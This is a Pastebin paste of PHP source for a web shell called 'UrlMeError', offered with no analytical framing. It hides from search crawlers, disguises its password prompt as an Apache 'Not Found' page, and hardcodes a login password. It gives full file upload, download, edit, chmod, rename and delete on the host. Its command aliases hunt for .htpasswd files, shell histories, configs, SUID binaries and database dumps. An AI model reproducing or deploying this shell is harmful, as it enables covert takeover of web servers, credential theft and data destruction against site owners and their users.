Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- error_reporting(0);
- set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @clearstatcache();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- $auth_user = "529452e5eb83062be9d3cfa3c1784982"; // user : urlmeerror
- $auth_pass = "529452e5eb83062be9d3cfa3c1784982"; // pass : urlmeerror
- $errorforbidden = $_SERVER['REQUEST_URI'];
- $color = "#00ff00";
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- function login_shell() {
- ?>
- <?php
- $errorforbidden = $_SERVER['REQUEST_URI'];
- $login = '<style> input { margin:0;background-color:black;border:1px solid black; }</style>
- <center><form method="post"><input type="password" name="pass"></form></center>';
- ?>
- <html>
- <head>
- <meta charset="UTF-8">
- <meta http-equiv="refresh" content="1"/>
- </head>
- <body onbeforeunload="return Reload()">
- <script>
- function Reload() {
- return "Login This Page?"
- }
- </script>
- <body oncontextmenu='return false;' onkeydown='return true;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
- </body>
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <hr>
- <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <form method=post>
- <input type=password name=user>
- </form></center>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form></center>
- <?php
- exit;
- }
- if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- if( strtolower( substr(PHP_OS,0,3) ) == "win" )
- $os = 'win';
- else
- $os = 'nix';
- $safe_mode = @ini_get('safe_mode');
- $disable_functions = @ini_get('disable_functions');
- $home_cwd = @getcwd();
- if( isset( $_POST['c'] ) )
- @chdir($_POST['c']);
- $cwd = @getcwd();
- if( $os == 'win') {
- $home_cwd = str_replace("\\", "/", $home_cwd);
- $cwd = str_replace("\\", "/", $cwd);
- }
- if( $cwd[strlen($cwd)-1] != '/' )
- $cwd .= '/';
- if($os == 'win')
- $aliases = array(
- "List Directory" => "dir",
- "Find index.php in current dir" => "dir /s /w /b index.php",
- "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
- "Show active connections" => "netstat -an",
- "Show running services" => "net start",
- "User accounts" => "net user",
- "Show computers" => "net view",
- "ARP Table" => "arp -a",
- "IP Configuration" => "ipconfig /all"
- );
- else
- $aliases = array(
- "List dir" => "ls -la",
- "list file attributes on a Linux second extended file system" => "lsattr -va",
- "show opened ports" => "netstat -an | grep -i listen",
- "Find" => "",
- "find all suid files" => "find / -type f -perm -04000 -ls",
- "find suid files in current dir" => "find . -type f -perm -04000 -ls",
- "find all sgid files" => "find / -type f -perm -02000 -ls",
- "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
- "find config.inc.php files" => "find / -type f -name config.inc.php",
- "find config* files" => "find / -type f -name \"config*\"",
- "find config* files in current dir" => "find . -type f -name \"config*\"",
- "find all writable folders and files" => "find / -perm -2 -ls",
- "find all writable folders and files in current dir" => "find . -perm -2 -ls",
- "find all service.pwd files" => "find / -type f -name service.pwd",
- "find service.pwd files in current dir" => "find . -type f -name service.pwd",
- "find all .htpasswd files" => "find / -type f -name .htpasswd",
- "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
- "find all .bash_history files" => "find / -type f -name .bash_history",
- "find .bash_history files in current dir" => "find . -type f -name .bash_history",
- "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
- "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
- "Locate" => "",
- "locate httpd.conf files" => "locate httpd.conf",
- "locate vhosts.conf files" => "locate vhosts.conf",
- "locate proftpd.conf files" => "locate proftpd.conf",
- "locate psybnc.conf files" => "locate psybnc.conf",
- "locate my.conf files" => "locate my.conf",
- "locate admin.php files" =>"locate admin.php",
- "locate cfg.php files" => "locate cfg.php",
- "locate conf.php files" => "locate conf.php",
- "locate config.dat files" => "locate config.dat",
- "locate config.php files" => "locate config.php",
- "locate config.inc files" => "locate config.inc",
- "locate config.inc.php" => "locate config.inc.php",
- "locate config.default.php files" => "locate config.default.php",
- "locate config* files " => "locate config",
- "locate .conf files"=>"locate '.conf'",
- "locate .pwd files" => "locate '.pwd'",
- "locate .sql files" => "locate '.sql'",
- "locate .htpasswd files" => "locate '.htpasswd'",
- "locate .bash_history files" => "locate '.bash_history'",
- "locate .mysql_history files" => "locate '.mysql_history'",
- "locate .fetchmailrc files" => "locate '.fetchmailrc'",
- "locate backup files" => "locate backup",
- "locate dump files" => "locate dump",
- "locate priv files" => "locate priv"
- );
- function printHeader() {
- if(empty($_POST['charset']))
- $_POST['charset'] = "UTF-8";
- global $color;
- ?>
- <?php print $login; ?>
- <?php
- exit;
- }
- if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
- if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- login_shell();
- if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
- @ob_clean();
- $file = $_GET['file'];
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.basename($file).'"');
- header('Expires: 0');
- header('Cache-Control: must-revalidate');
- header('Pragma: public');
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit;
- }
- echo '<!DOCTYPE HTML>
- <HTML>
- <HEAD>
- <title>UrlMeError</title>
- </head>
- <style>
- body{
- font-family: "console", cursive;
- background-color:black;
- text-shadow:0px 0px 1px solid lime;
- }
- #content tr:hover{
- background-color:black;
- text-shadow:0px 0px 10px solid lime;
- }
- #content .first{
- background-color:white;
- }
- #content .first:hover{
- background-color:white;
- text-shadow:0px 0px 1px solid lime;
- }
- table{
- border: 2px solid white; dotted;
- }
- H1{
- font-family: "Rye", cursive;
- }
- a{
- color:white;
- text-decoration: none;
- }
- a:hover{
- color:white;
- text-shadow:0px 0px 10px solid lime;
- }
- input,select,textarea{
- border: 1px solid white;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- </style>
- <HEAD>
- </head>
- <BODY>
- <body ononline="Online()" onoffline="Offline()">
- <script>
- function Online() {
- alert ("Data Mode ON");
- }
- function Offline() {
- alert ("Data Mode OFF");
- }
- </script>
- <H2><center><style> #roll-bg { margin:1em auto; -webkit-perspective:1200px; -moz-perspective:1200px; -ms-perspective:1200px; perspective:1200px; } #roll-bg p { size:7; text-align:center; font color:white; font-family:cursive; padding:10px 0; } #roll-spin { -webkit-animation-name:roll-spin; -webkit-animation-timing-function:linear; -webkit-animation-iteration-count:infinite; -webkit-animation-duration:6s; animation-name:roll-spin; animation-timing-function:linear; animation-iteration-count:infinite; animation-duration:6s; -webkit-transform-style:preserve-3d; -moz-transform-style:preserve-3d; -ms-transform-style:preserve-3d; transform-style:preserve-3d; } #roll-spin:hover { -webkit-animation-play-state:play; animation-play-state:play; } @-webkit-keyframes roll-spin { from {-webkit-transform:rotateY(0deg);} to {-webkit-transform:rotateY(-360deg);} } @keyframes roll-spin { from {-moz-transform:rotateY(0deg); -ms-transform:rotateY(0deg); transform:rotateY(0deg);} to {-moz-transform:rotateY(-360deg); -ms-transform:rotateY(-360deg); transform:rotateY(-360deg);} } </style> <div id="roll-bg"> <p id="roll-spin"><img src="https://cdn.pbrd.co/images/HgYDvs7.png"width="150" height="150 "></div></center></H2>
- <body class=" pace-done" bgcolor="white"><font color="white"><div class="pace pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
- <table width="1000" align="center">
- <tr><td>Current Path : ';
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a></font>/';
- }
- echo '</td></tr><tr><td>';
- if(isset($_FILES['file'])){
- if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
- echo '<font color="lime">O</font><br />';
- }else{
- echo '<font color="red">-</font><br />';
- }
- }
- echo '<form enctype="multipart/form-data" method="POST">
- Upload File : <input type="file" name="file" />
- <input type="submit" value="upload"/>
- </form>
- </td></tr>';
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="lime">O</font><br />';
- }else{
- echo '<font color="red">-</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="lime">O</font><br />';
- }else{
- echo '<font color="red">-</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="lime">O</font><br />';
- }else{
- echo '<font color="red">-</font><br />';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Go" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br /><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="lime">O</font><br />';
- }else{
- echo '<font color="red">-</font><br />';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="lime">O</font><br />';
- }else{
- echo '<font color="red">-</font><br />';
- }
- }
- }
- echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="1000" align="center">
- <tr class="first">
- <td><center><font color="black">Name</center></td>
- <td><center><font color="black">Size</center></td>
- <td><center><font color="black">Permissions</center></td>
- <td><center><font color="black">Options</font></center></td>
- </tr>';
- foreach($scandir as $dir){
- if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
- echo "<tr>
- <td><a href=\"?path=$path/$dir\">$dir</a></td>
- <td><center>--</center></td>
- <td><center>";
- if(is_writable("$path/$dir")) echo '<font color="lime">';
- elseif(!is_readable("$path/$dir")) echo '<font color="red">';
- echo perms("$path/$dir");
- if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$path\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"dir\">
- <input type=\"hidden\" name=\"name\" value=\"$dir\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
- <input type=\"submit\" value=\"Oke\" />
- </form></center></td>
- </tr>";
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file("$path/$file")) continue;
- $size = filesize("$path/$file")/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo "<tr>
- <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
- <td><center>".$size."</center></td>
- <td><center>";
- if(is_writable("$path/$file")) echo '<font color="lime">';
- elseif(!is_readable("$path/$file")) echo '<font color="red">';
- echo perms("$path/$file");
- if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$path\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- <option value=\"edit\">Edit</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"file\">
- <input type=\"hidden\" name=\"name\" value=\"$file\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
- <input type=\"submit\" value=\"Oke\" />
- </form></center></td>
- </tr>";
- }
- echo '</table>
- </div>';
- }
- echo '<center></br></br></br></br></br><b>Copyright © National Security System 2018</font></b><center>
- </BODY>
- </HTML>';
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement